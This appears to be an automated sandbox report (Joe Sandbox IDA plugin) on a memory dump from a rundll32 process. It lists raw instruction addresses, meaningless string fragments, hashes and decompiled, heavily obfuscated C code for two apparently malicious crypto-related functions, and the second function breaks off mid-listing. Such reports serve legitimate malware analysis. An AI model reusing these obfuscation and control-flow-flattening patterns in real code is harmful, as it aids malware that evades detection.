0x001b6147
0x001b614f
0x001b615a
0x001b6161
0x001b616c
0x001b6174
0x001b6179
0x001b6181
0x001b6189
0x001b6191
0x001b6195
0x001b619a
0x001b61a2
0x001b61aa
0x001b61b7
0x001b61bb
0x001b61c0
0x001b61c8
0x001b61de
0x001b61e5
0x001b61f0
0x001b61f8
0x001b6200
0x001b6204
0x001b6205
0x001b6207
0x001b620b
0x001b6213
0x001b621b
0x001b6223
0x001b6228
0x001b6230
0x001b6238
0x001b6243
0x001b624e
0x001b6259
0x001b6264
0x001b626c
0x001b6277
0x001b6282
0x001b628d
0x001b6298
0x001b62a3
0x001b62ae
0x001b62b9
0x001b62c4
0x001b62cc
0x001b62d7
0x001b62df
0x001b62e7
0x001b62ec
0x001b62f4
0x001b62fc
0x001b6306
0x001b630e
0x001b6316
0x001b631e
0x001b632b
0x001b632f
0x001b6337
0x001b633f
0x001b6347
0x001b6354
0x001b6358
0x001b6360
0x001b6368
0x001b6373
0x001b6386
0x001b638d
0x001b6398
0x001b63a3
0x001b63ae
0x001b63ae
0x001b63b9
0x001b63b9
0x001b63b9
0x001b63b9
0x001b63bf
0x00000000
0x00000000
0x001b63c5
0x001b64dd
0x001b64e1
0x001b64f3
0x001b64f4
0x001b64ff
0x001b6500
0x001b6501
0x001b6507
0x001b6509
0x001b650b
0x001b650d
0x001b650f
0x001b6535
0x001b6538
0x00000000
0x001b6511
0x001b6511
0x00000000
0x001b6513
0x001b6513
0x001b6516
0x001b6519
0x001b651d
0x001b651e
0x001b6523
0x001b652a
0x001b6532
0x00000000
0x001b6532
0x001b6511
0x001b63cb
0x001b63d1
0x001b64ca
0x001b64cd
0x001b64d2
0x001b64d3
0x00000000
0x001b63d7
0x001b63dd
0x001b669b
0x001b63e3
0x001b63e9
0x001b646a
0x001b646f
0x001b6470
0x001b6470
0x001b6473
0x001b6477
0x001b6483
0x001b6486
0x001b6487
0x001b648e
0x001b6495
0x001b649c
0x001b649e
0x001b649e
0x001b64a0
0x001b64a4
0x001b64a6
0x001b64a8
0x001b64ad
0x001b6687
0x001b64b3
0x001b64b3
0x00000000
0x001b64b3
0x001b63eb
0x001b63f1
0x001b6436
0x001b643d
0x001b6444
0x001b644b
0x001b6450
0x001b6457
0x001b645f
0x00000000
0x001b63f3
0x001b63f9
0x00000000
0x001b63ff
0x001b640c
0x001b640f
0x001b6414
0x001b6415
0x00000000
0x001b6415
0x001b63f9
0x001b63f1
0x001b63e9
0x001b63dd
0x001b63d1
0x001b66a1
0x001b66ad
0x001b66ad
0x001b653b
0x001b6660
0x001b6665
0x001b6666
0x001b666a
0x001b666f
0x001b6672
0x00000000
0x001b6541
0x001b6547
0x001b6627
0x001b662f
0x001b6634
0x001b663b
0x001b6643
0x00000000
0x001b654d
0x001b6553
0x001b65ad
0x001b65b3
0x001b65be
0x001b65cd
0x001b65d9
0x001b65e2
0x001b65eb
0x001b65f3
0x001b65f5
0x001b65fa
0x00000000
0x001b6555
0x001b655b
0x00000000
0x001b6561
0x001b6574
0x001b6575
0x001b6578
0x001b657d
0x001b6580
0x001b6587
0x001b658d
0x00000000
0x001b658d
0x001b6587
0x001b655b
0x001b6553
0x001b6547
0x00000000
0x001b6677
0x001b6677
0x00000000

Strings

zJ, xrefs: 001B61C0
';?, xrefs: 001B6147
c$, xrefs: 001B5D3F
%X, xrefs: 001B5E1E
%A, xrefs: 001B6161
js, xrefs: 001B6347
<k, xrefs: 001B5FDB
@@QJ, xrefs: 001B5DD7
/>, xrefs: 001B62F4
'", xrefs: 001B5D11
qz}(, xrefs: 001B63B9
\$}*, xrefs: 001B5D77
P., xrefs: 001B60B4
&, xrefs: 001B61F0
?, xrefs: 001B605B
N+, xrefs: 001B600A
c5, xrefs: 001B626C
r:, xrefs: 001B5E83

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %A$%X$&$'"$';?$/>$<k$?$@@QJ$N+$P.$\$}*$c$$js$qz}($r:$zJ$c5
API String ID: 0-964183182
Opcode ID: fef31e83f1d5d15cfa39de79b1d5c00e8fe502cbbfe896d019fce4dedf39dd3f
Instruction ID: 72eb8743e5dd552b7e24ec6db3fa0d1aaffc9455d6304f9f3655c867d4754e1d
Opcode Fuzzy Hash: fef31e83f1d5d15cfa39de79b1d5c00e8fe502cbbfe896d019fce4dedf39dd3f
Instruction Fuzzy Hash: 0532457250C380DFE368CF24C98AA9BBBE1BBD5344F10891DE5D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A415F, Relevance: 20.4, Strings: 16, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E001A415F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr* _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				unsigned int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				signed int _v1232;
				void* _t467;
				intOrPtr* _t470;
				intOrPtr* _t472;
				signed int _t484;
				void* _t486;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				intOrPtr _t530;
				intOrPtr* _t531;
				intOrPtr* _t532;
				signed int* _t536;
				void* _t540;

				_t536 =  &_v1232;
				_v1200 = 0x152a;
				_v1200 = _v1200 >> 8;
				_t486 = 0x66715dc;
				_v1200 = _v1200 + 0xcebc;
				_v1200 = _v1200 << 4;
				_v1200 = _v1200 ^ 0x000ced39;
				_v1044 = 0xdddd;
				_v1044 = _v1044 * 0x65;
				_t532 = 0;
				_v1044 = _v1044 ^ 0x00579774;
				_v1128 = 0x2fcf;
				_t523 = 0x25;
				_v1128 = _v1128 / _t523;
				_v1128 = _v1128 + 0xffff498b;
				_v1128 = _v1128 ^ 0xffff5057;
				_v1176 = 0xd900;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 | 0x7daa82a3;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0xba0af7a4;
				_v1072 = 0xdf36;
				_v1072 = _v1072 ^ 0x5cef088e;
				_v1072 = _v1072 ^ 0x5cefbaae;
				_v1152 = 0x21d9;
				_t484 = 0x72;
				_v1052 = 0;
				_v1152 = _v1152 * 0x21;
				_v1152 = _v1152 | 0x13dcd65f;
				_v1152 = _v1152 ^ 0x13dcc02d;
				_v1088 = 0x136f;
				_v1088 = _v1088 | 0x4b6a172f;
				_v1088 = _v1088 ^ 0x4b6a6136;
				_v1184 = 0xfe59;
				_v1184 = _v1184 << 0xf;
				_v1184 = _v1184 >> 2;
				_v1184 = _v1184 ^ 0x649757e4;
				_v1184 = _v1184 ^ 0x7b5c34f4;
				_v1216 = 0xd033;
				_v1216 = _v1216 + 0xffff521f;
				_v1216 = _v1216 | 0xe290528f;
				_v1216 = _v1216 >> 4;
				_v1216 = _v1216 ^ 0x0e292e59;
				_v1120 = 0xff41;
				_v1120 = _v1120 >> 8;
				_v1120 = _v1120 + 0xdd05;
				_v1120 = _v1120 ^ 0x0000c1e1;
				_v1144 = 0x65dc;
				_v1144 = _v1144 * 0x13;
				_v1144 = _v1144 / _t484;
				_v1144 = _v1144 ^ 0x00004c5d;
				_v1048 = 0x4fbb;
				_v1048 = _v1048 >> 0xf;
				_v1048 = _v1048 ^ 0x00002ab8;
				_v1168 = 0xae1f;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 + 0xffff74f0;
				_v1168 = _v1168 << 4;
				_v1168 = _v1168 ^ 0x5c356a94;
				_v1208 = 0x359d;
				_v1208 = _v1208 | 0x5603fb4d;
				_v1208 = _v1208 ^ 0x93f65ffe;
				_v1208 = _v1208 + 0xffff2544;
				_v1208 = _v1208 ^ 0xc5f49583;
				_v1096 = 0x7882;
				_v1096 = _v1096 >> 0xf;
				_v1096 = _v1096 ^ 0x00002419;
				_v1056 = 0xcea3;
				_v1056 = _v1056 | 0x0e5b8076;
				_v1056 = _v1056 ^ 0x0e5bb652;
				_v1080 = 0x3155;
				_v1080 = _v1080 << 0xe;
				_v1080 = _v1080 ^ 0x0c55200b;
				_v1136 = 0xba36;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 + 0xffffe69b;
				_v1136 = _v1136 ^ 0xffffbbcd;
				_v1112 = 0x85c1;
				_v1112 = _v1112 >> 1;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0x00041278;
				_v1232 = 0x2479;
				_v1232 = _v1232 + 0xcb0a;
				_t524 = 0x1f;
				_v1232 = _v1232 / _t524;
				_v1232 = _v1232 >> 4;
				_v1232 = _v1232 ^ 0x00007b29;
				_v1064 = 0xe02a;
				_v1064 = _v1064 ^ 0xc62293c8;
				_v1064 = _v1064 ^ 0xc62218e6;
				_v1068 = 0x44e;
				_v1068 = _v1068 | 0xb4aa3349;
				_v1068 = _v1068 ^ 0xb4aa2b2b;
				_v1076 = 0x9e01;
				_v1076 = _v1076 | 0xaa6898da;
				_v1076 = _v1076 ^ 0xaa68d402;
				_v1212 = 0x5c9b;
				_v1212 = _v1212 << 9;
				_v1212 = _v1212 + 0xffff9f0e;
				_v1212 = _v1212 << 0xc;
				_v1212 = _v1212 ^ 0x8d509c36;
				_v1116 = 0x1499;
				_v1116 = _v1116 << 6;
				_t525 = 0x2a;
				_v1116 = _v1116 / _t525;
				_v1116 = _v1116 ^ 0x00002ed9;
				_v1124 = 0xa5a;
				_t526 = 0x54;
				_v1124 = _v1124 * 0x75;
				_v1124 = _v1124 >> 9;
				_v1124 = _v1124 ^ 0x00002bb5;
				_v1220 = 0x42d6;
				_v1220 = _v1220 << 8;
				_v1220 = _v1220 + 0xffffc475;
				_v1220 = _v1220 | 0x5a28b5fc;
				_v1220 = _v1220 ^ 0x5a6ace7c;
				_v1132 = 0x1da4;
				_v1132 = _v1132 * 0x78;
				_v1132 = _v1132 | 0xeed517ac;
				_v1132 = _v1132 ^ 0xeedd9478;
				_v1084 = 0x3643;
				_v1084 = _v1084 ^ 0x7308e5d5;
				_v1084 = _v1084 ^ 0x7308c10b;
				_v1092 = 0x4e6;
				_v1092 = _v1092 ^ 0x5bad2aff;
				_v1092 = _v1092 ^ 0x5bad788f;
				_v1148 = 0xe1d8;
				_v1148 = _v1148 ^ 0x6292657d;
				_v1148 = _v1148 | 0x653adfa7;
				_v1148 = _v1148 ^ 0x67baa6af;
				_v1180 = 0x9ec4;
				_v1180 = _v1180 / _t526;
				_v1180 = _v1180 | 0xff8fffef;
				_v1180 = _v1180 ^ 0xff8f83ae;
				_v1188 = 0xe04c;
				_v1188 = _v1188 << 0xa;
				_v1188 = _v1188 + 0xc4a8;
				_v1188 = _v1188 ^ 0x4d3f4464;
				_v1188 = _v1188 ^ 0x4ebe98af;
				_v1100 = 0x76ef;
				_v1100 = _v1100 + 0xc8d0;
				_v1100 = _v1100 ^ 0x935e593d;
				_v1100 = _v1100 ^ 0x935f6b67;
				_v1160 = 0x131a;
				_v1160 = _v1160 + 0x8824;
				_v1160 = _v1160 + 0x4219;
				_v1160 = _v1160 ^ 0x392ff046;
				_v1160 = _v1160 ^ 0x392f03d1;
				_v1224 = 0xd716;
				_t527 = 0xa;
				_v1224 = _v1224 / _t527;
				_t528 = 0x74;
				_v1224 = _v1224 / _t528;
				_v1224 = _v1224 >> 0xf;
				_v1224 = _v1224 ^ 0x00002348;
				_v1192 = 0x454e;
				_v1192 = _v1192 + 0x4723;
				_v1192 = _v1192 | 0x7d53cea4;
				_v1192 = _v1192 + 0x2839;
				_v1192 = _v1192 ^ 0x7d53a8a1;
				_v1104 = 0x430c;
				_v1104 = _v1104 / _t528;
				_t529 = 0x5a;
				_v1104 = _v1104 * 0x36;
				_v1104 = _v1104 ^ 0x000056a7;
				_v1060 = 0xa641;
				_v1060 = _v1060 + 0xffff95bb;
				_v1060 = _v1060 ^ 0x0000311b;
				_v1156 = 0xd3b;
				_v1156 = _v1156 + 0x3800;
				_v1156 = _v1156 + 0xffff7466;
				_v1156 = _v1156 | 0xdb0d9699;
				_v1156 = _v1156 ^ 0xffffaa13;
				_v1164 = 0xd68f;
				_v1164 = _v1164 ^ 0x9f1ca777;
				_v1164 = _v1164 >> 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0x004fa0f1;
				_v1172 = 0x8e1a;
				_v1172 = _v1172 ^ 0xfd2450e4;
				_v1172 = _v1172 + 0x4fb;
				_v1172 = _v1172 + 0xffff8789;
				_v1172 = _v1172 ^ 0xfd247c32;
				_v1228 = 0xa048;
				_v1228 = _v1228 | 0x9ec1f950;
				_v1228 = _v1228 / _t529;
				_v1228 = _v1228 >> 0x10;
				_v1228 = _v1228 ^ 0x000f01fc;
				_v1196 = 0xaa8b;
				_v1196 = _v1196 << 0xd;
				_v1196 = _v1196 | 0x23cf0493;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x64930002;
				_v1108 = 0x6fa4;
				_v1108 = _v1108 + 0xffffd087;
				_v1108 = _v1108 << 0xf;
				_v1108 = _v1108 ^ 0x20158002;
				_v1204 = 0xbe7f;
				_v1204 = _v1204 ^ 0x05dd39e9;
				_t485 = _v1052;
				_t535 = _v1052;
				_t530 = _v1052;
				_v1204 = _v1204 / _t484;
				_v1204 = _v1204 ^ 0x000d2bdb;
				_v1140 = 0x81b1;
				_v1140 = _v1140 + 0xffff3d40;
				_v1140 = _v1140 * 0x71;
				_v1140 = _v1140 ^ 0xffe34871;
				while(1) {
					L1:
					_t467 = 0x5c;
					do {
						while(1) {
							L2:
							_t540 = _t486 - 0x19b4461d;
							if(_t540 > 0) {
								break;
							}
							if(_t540 == 0) {
								E001A24A4(_t485, _v1060, _v1156, _v1164, _v1172);
							} else {
								if(_t486 == 0x169732f) {
									_t531 =  *0x10020724;
									while(1) {
										__eflags =  *_t531 - _t467;
										if(__eflags == 0) {
											break;
										}
										_t531 = _t531 + 2;
										__eflags = _t531;
									}
									_t530 = _t531 + 2;
									_t486 = 0x378e2f54;
									continue;
								} else {
									if(_t486 == 0x66715dc) {
										_push(_t486);
										E001B1DA0(_v1128, _v1176, _v1072,  &_v1040, _v1152, _t486, _v1200);
										_t536 =  &(_t536[8]);
										_t486 = 0x10a32bba;
										while(1) {
											L1:
											_t467 = 0x5c;
											goto L2;
										}
									} else {
										if(_t486 == 0x10a32bba) {
											_push(_v1216);
											_push(_v1184);
											E001AE32E(E001A5EBA(_v1088, 0x1001f820, __eflags), __eflags, _v1144, _v1048,  *0x10020724 + 0x238, _v1168, 0x104,  &_v520, _v1208,  &_v1040,  *0x10020724, _v1096);
											E001AED35(_v1056, _t476, _v1080, _v1136);
											_t532 = _v1052;
											_t536 =  &(_t536[0xe]);
											_t486 = 0x169732f;
											while(1) {
												L1:
												_t467 = 0x5c;
												goto L2;
											}
										} else {
											if(_t486 != 0x169fd40b) {
												goto L24;
											} else {
												E001A24A4(_t535, _v1160, _v1224, _v1192, _v1104);
												_t536 =  &(_t536[3]);
												L9:
												_t486 = 0x19b4461d;
												while(1) {
													L1:
													_t467 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _t532;
						}
						__eflags = _t486 - 0x1a7e72a2;
						if(_t486 == 0x1a7e72a2) {
							E001B9BE4(_v1180, _v1188, _t535, _v1100, _t485);
							_t536 =  &(_t536[3]);
							_t486 = 0x169fd40b;
							_t467 = 0x5c;
							goto L24;
						} else {
							__eflags = _t486 - 0x28ee42ec;
							if(_t486 == 0x28ee42ec) {
								_push(_v1148);
								_push(_v1092);
								_push(_t530);
								_push(_v1084);
								_push(_v1140);
								_push(_t486);
								_push(_v1132);
								_push( &_v520);
								_push(_v1220);
								_push(_v1124);
								_push(_v1116);
								_push(_v1212);
								_push(_v1076);
								_push(_t530);
								_push(_v1068);
								_push(_v1204);
								_push(_t486);
								_push(_v1108);
								_t470 = E001A39C3(_v1196, _t485);
								_t535 = _t470;
								_t536 = _t536 - 0xc + 0x54;
								__eflags = _t470;
								if(__eflags == 0) {
									goto L9;
								} else {
									_t486 = 0x1a7e72a2;
									_t532 = 1;
									_v1052 = 1;
									goto L1;
								}
							} else {
								__eflags = _t486 - 0x378e2f54;
								if(_t486 != 0x378e2f54) {
									goto L24;
								} else {
									_t472 = E001B92EB(_t486, _v1112, _v1228, _t486, _v1232, _v1064);
									_t485 = _t472;
									_t536 =  &(_t536[4]);
									__eflags = _t472;
									if(__eflags != 0) {
										_t486 = 0x28ee42ec;
										while(1) {
											L1:
											_t467 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t486 - 0x60970a6;
					} while (__eflags != 0);
					goto L27;
				}
			}

0x001a415f
0x001a4165
0x001a416f
0x001a4174
0x001a4179
0x001a4181
0x001a4186
0x001a418e
0x001a41a5
0x001a41ac
0x001a41ae
0x001a41b9
0x001a41c7
0x001a41cc
0x001a41d2
0x001a41da
0x001a41e2
0x001a41ea
0x001a41ef
0x001a41f7
0x001a41fc
0x001a4204
0x001a420f
0x001a421a
0x001a4225
0x001a4232
0x001a4233
0x001a423a
0x001a423e
0x001a4246
0x001a424e
0x001a4259
0x001a4264
0x001a426f
0x001a4277
0x001a427c
0x001a4281
0x001a4289
0x001a4291
0x001a4299
0x001a42a1
0x001a42a9
0x001a42ae
0x001a42b6
0x001a42c1
0x001a42c9
0x001a42d4
0x001a42df
0x001a42ec
0x001a42f6
0x001a42fa
0x001a4302
0x001a430d
0x001a4315
0x001a4320
0x001a4328
0x001a432d
0x001a4335
0x001a433a
0x001a4342
0x001a434a
0x001a4352
0x001a435a
0x001a4362
0x001a436a
0x001a4375
0x001a437d
0x001a4388
0x001a4395
0x001a43a0
0x001a43ab
0x001a43b6
0x001a43be
0x001a43c9
0x001a43d1
0x001a43d6
0x001a43de
0x001a43e6
0x001a43f1
0x001a43f8
0x001a4400
0x001a440b
0x001a4413
0x001a4421
0x001a4426
0x001a442c
0x001a4431
0x001a4439
0x001a4444
0x001a444f
0x001a445a
0x001a4465
0x001a4470
0x001a447b
0x001a4486
0x001a4491
0x001a449c
0x001a44a4
0x001a44a9
0x001a44b1
0x001a44b6
0x001a44be
0x001a44c9
0x001a44d8
0x001a44dd
0x001a44e6
0x001a44f1
0x001a4504
0x001a4505
0x001a4509
0x001a450e
0x001a4516
0x001a451e
0x001a4523
0x001a452b
0x001a4533
0x001a453b
0x001a4548
0x001a454c
0x001a4554
0x001a455c
0x001a4567
0x001a4572
0x001a457d
0x001a4588
0x001a4593
0x001a459e
0x001a45a6
0x001a45ae
0x001a45b6
0x001a45be
0x001a45cc
0x001a45d0
0x001a45d8
0x001a45e0
0x001a45ea
0x001a45ef
0x001a45f7
0x001a45ff
0x001a4607
0x001a4612
0x001a461d
0x001a4628
0x001a4633
0x001a463b
0x001a4643
0x001a464b
0x001a4653
0x001a465b
0x001a4669
0x001a466e
0x001a4678
0x001a467d
0x001a4681
0x001a4686
0x001a468e
0x001a4696
0x001a469e
0x001a46a6
0x001a46ae
0x001a46b6
0x001a46cc
0x001a46dd
0x001a46de
0x001a46e5
0x001a46f0
0x001a46fb
0x001a4706
0x001a4711
0x001a4719
0x001a4721
0x001a4729
0x001a4731
0x001a4739
0x001a4741
0x001a4749
0x001a474e
0x001a4753
0x001a475b
0x001a4763
0x001a476b
0x001a4773
0x001a477b
0x001a4783
0x001a478b
0x001a4799
0x001a479d
0x001a47a2
0x001a47aa
0x001a47b2
0x001a47b7
0x001a47bf
0x001a47c4
0x001a47cc
0x001a47d7
0x001a47e2
0x001a47ea
0x001a47f5
0x001a47fd
0x001a4815
0x001a481c
0x001a4823
0x001a482a
0x001a482e
0x001a4836
0x001a483e
0x001a484b
0x001a484f
0x001a4857
0x001a4857
0x001a4859
0x001a485a
0x001a485a
0x001a485a
0x001a485a
0x001a4860
0x00000000
0x00000000
0x001a4866
0x001a4ad3
0x001a486c
0x001a4872
0x001a4995
0x001a49a0
0x001a49a0
0x001a49a3
0x00000000
0x00000000
0x001a499d
0x001a499d
0x001a499d
0x001a49a5
0x001a49a8
0x00000000
0x001a4878
0x001a487e
0x001a4958
0x001a4983
0x001a4988
0x001a498b
0x001a4857
0x001a4857
0x001a4859
0x00000000
0x001a4859
0x001a4884
0x001a488a
0x001a48bc
0x001a48c5
0x001a4923
0x001a493f
0x001a4944
0x001a494b
0x001a494e
0x001a4857
0x001a4857
0x001a4859
0x00000000
0x001a4859
0x001a488c
0x001a4892
0x00000000
0x001a4898
0x001a48ad
0x001a48b2
0x001a48b5
0x001a48b5
0x001a4857
0x001a4857
0x001a4859
0x00000000
0x001a4859
0x001a4857
0x001a4892
0x001a488a
0x001a487e
0x001a4872
0x001a4adc
0x001a4ae7
0x001a4ae7
0x001a49b2
0x001a49b8
0x001a4aa0
0x001a4aa5
0x001a4aa8
0x001a4aaf
0x00000000
0x001a49be
0x001a49be
0x001a49c4
0x001a4a05
0x001a4a12
0x001a4a19
0x001a4a1a
0x001a4a21
0x001a4a25
0x001a4a26
0x001a4a2d
0x001a4a31
0x001a4a35
0x001a4a3c
0x001a4a43
0x001a4a47
0x001a4a4e
0x001a4a4f
0x001a4a56
0x001a4a5a
0x001a4a5b
0x001a4a69
0x001a4a6e
0x001a4a70
0x001a4a73
0x001a4a75
0x00000000
0x001a4a7b
0x001a4a7d
0x001a4a82
0x001a4a83
0x00000000
0x001a4a83
0x001a49c6
0x001a49c6
0x001a49cc
0x00000000
0x001a49d2
0x001a49e9
0x001a49ee
0x001a49f0
0x001a49f3
0x001a49f5
0x001a49fb
0x001a4857
0x001a4857
0x001a4859
0x00000000
0x001a4859
0x001a4857
0x001a49f5
0x001a49cc
0x001a49c4
0x00000000
0x001a4ab0
0x001a4ab0
0x001a4ab0
0x00000000
0x001a4abc

Strings

B(, xrefs: 001A49BE
y$, xrefs: 001A440B
){, xrefs: 001A4431
dD?M, xrefs: 001A45F7
9(, xrefs: 001A46A6
v, xrefs: 001A4607
U1, xrefs: 001A43AB
]L, xrefs: 001A42FA
ar-KW, xrefs: 001A4903, 001A490D, 001A4995
B(, xrefs: 001A49FB
C6, xrefs: 001A455C
Z, xrefs: 001A44F1
6ajK, xrefs: 001A4264
;, xrefs: 001A4711
H#, xrefs: 001A4686
*, xrefs: 001A4439

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ){$*$6ajK$9($;$C6$H#$U1$Z$]L$ar-KW$dD?M$y$$B($B($v
API String ID: 0-511145135
Opcode ID: 9d0496e9b993fe2e3d1c3a9547b1072d09240c8b7c9e1ee70c8e91f26168d0fd
Instruction ID: 7f0feaf263a886ae90ad96780a36ec3ad2aa0b449238184dba1ad5373c0a7042
Opcode Fuzzy Hash: 9d0496e9b993fe2e3d1c3a9547b1072d09240c8b7c9e1ee70c8e91f26168d0fd
Instruction Fuzzy Hash: 18220271508381DFE3A9CF61C54AA5BFBE1BBC5708F10891DE2DA86260C7B58949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 001B5136, Relevance: 16.6, Strings: 13, Instructions: 392
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001B5136(intOrPtr* __ecx, intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				unsigned int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				void* _t364;
				void* _t412;
				signed int _t416;
				void* _t427;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				intOrPtr _t439;
				intOrPtr* _t445;
				char* _t479;
				signed int _t480;
				signed int _t481;
				char* _t482;
				signed int _t483;
				signed int _t484;
				intOrPtr* _t487;
				signed int* _t489;
				void* _t491;

				_push(_a16);
				_t429 = __edx;
				_t487 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t364);
				_v248 = 0x7aeb;
				_t489 =  &(( &_v264)[6]);
				_v248 = _v248 + 0xffff9799;
				_t483 = 0x2905c209;
				_v128 = _v128 & 0x00000000;
				_t431 = 0x6e;
				_v248 = _v248 / _t431;
				_v248 = _v248 + 0x3986;
				_v248 = _v248 ^ 0x000039f1;
				_v192 = 0xca36;
				_v192 = _v192 + 0x9526;
				_t480 = 0x4a;
				_t432 = 0x72;
				_v192 = _v192 * 0x72;
				_v192 = _v192 ^ 0x009c76fa;
				_v176 = 0x9123;
				_v176 = _v176 + 0x922f;
				_v176 = _v176 ^ 0xfd652240;
				_v176 = _v176 ^ 0xfd6446f9;
				_v144 = 0x31c;
				_v144 = _v144 << 0x10;
				_v144 = _v144 ^ 0x031c0ec9;
				_v152 = 0x69a7;
				_v152 = _v152 / _t480;
				_v152 = _v152 ^ 0x00002444;
				_v168 = 0x50c2;
				_v168 = _v168 + 0x7c40;
				_v168 = _v168 ^ 0x88d3bbe7;
				_v168 = _v168 ^ 0x88d36899;
				_v204 = 0x101c;
				_v204 = _v204 * 0x17;
				_v204 = _v204 / _t432;
				_v204 = _v204 ^ 0xfd2b18ae;
				_v204 = _v204 ^ 0xfd2b265d;
				_v156 = 0x658b;
				_v156 = _v156 << 7;
				_t433 = 0x42;
				_v156 = _v156 / _t433;
				_v156 = _v156 ^ 0x0000fdf0;
				_v244 = 0xffb5;
				_v244 = _v244 >> 1;
				_v244 = _v244 / _t480;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x00005dce;
				_v132 = 0x3193;
				_v132 = _v132 * 0x1b;
				_v132 = _v132 ^ 0x000561fb;
				_v164 = 0xa667;
				_v164 = _v164 << 0xa;
				_t434 = 0x3d;
				_v164 = _v164 / _t434;
				_v164 = _v164 ^ 0x000a81f1;
				_v172 = 0x7b75;
				_v172 = _v172 + 0xffffb5c9;
				_v172 = _v172 ^ 0x59441acb;
				_v172 = _v172 ^ 0x59444c61;
				_v200 = 0xfc5e;
				_v200 = _v200 + 0x9ad1;
				_t435 = 0x6e;
				_t481 = 0x52;
				_v200 = _v200 * 0x33;
				_v200 = _v200 ^ 0x00512420;
				_v160 = 0x2110;
				_v160 = _v160 / _t435;
				_v160 = _v160 >> 6;
				_v160 = _v160 ^ 0x0000709a;
				_v252 = 0xd2e5;
				_v252 = _v252 ^ 0x889a62ed;
				_v252 = _v252 + 0xffff7802;
				_v252 = _v252 + 0x83b1;
				_v252 = _v252 ^ 0x889a98ed;
				_v260 = 0x59bd;
				_v260 = _v260 >> 0xc;
				_v260 = _v260 << 9;
				_v260 = _v260 ^ 0x979198fc;
				_v260 = _v260 ^ 0x97919246;
				_v140 = 0x951a;
				_v140 = _v140 + 0xffffe012;
				_v140 = _v140 ^ 0x000024a5;
				_v264 = 0xa35c;
				_v264 = _v264 + 0x6bac;
				_v264 = _v264 + 0x6494;
				_v264 = _v264 + 0xffffc85b;
				_v264 = _v264 ^ 0x000173d7;
				_v208 = 0x9196;
				_v208 = _v208 + 0x42cf;
				_v208 = _v208 | 0x41e63773;
				_v208 = _v208 ^ 0xc001a7a7;
				_v208 = _v208 ^ 0x81e75dd0;
				_v240 = 0x6061;
				_v240 = _v240 << 7;
				_v240 = _v240 / _t481;
				_v240 = _v240 ^ 0x0a6214f0;
				_v240 = _v240 ^ 0x0a62c894;
				_v224 = 0x6ba4;
				_v224 = _v224 ^ 0xc434db96;
				_v224 = _v224 + 0x7649;
				_v224 = _v224 ^ 0x277494cb;
				_v224 = _v224 ^ 0xe3418cb8;
				_v180 = 0x97f8;
				_v180 = _v180 + 0x7a61;
				_v180 = _v180 | 0xaf533412;
				_v180 = _v180 ^ 0xaf53587e;
				_v188 = 0x4a2b;
